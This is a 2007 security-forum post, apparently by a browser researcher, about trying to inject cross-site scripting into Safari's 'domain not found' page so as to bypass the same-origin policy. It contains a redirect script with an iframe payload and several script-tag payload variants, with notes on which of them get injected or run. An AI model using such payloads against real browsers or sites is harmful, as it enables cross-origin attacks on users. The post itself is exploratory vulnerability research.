Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Safari SOP hangs by a thread...
Posted by: Gareth Heyes
Date: November 20, 2007 08:29AM

<script>
self.location = 'http://xyz<iframe onload=alert(1)>';
</script>

This almost works and tries to XSS the Safari domain not found page. The only problem is that because it's passed within the url any spaces get urlencoded so I need a workaround that will inject the xss even when urlencode is used. Anyone any ideas?

If it is possible to inject XSS (I'm not sure if it is) then the code is executed with local privileges and therefore SOP across domains can also be broken.

The following variants have also been tried but Safari doesn't allow incomplete script tags:-

//Injected but doesn't execute
<script>alert(1)
//Injected but doesn't execute
<script>alert(1)<script>
//The forward slash is removed so isn't injected
<script>alert(1)</script>
//Is injected in the google search box but the quote is escaped to &quot;
"><script>alert(1)<%2fscript>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote


Sorry, only registered users may post in this forum.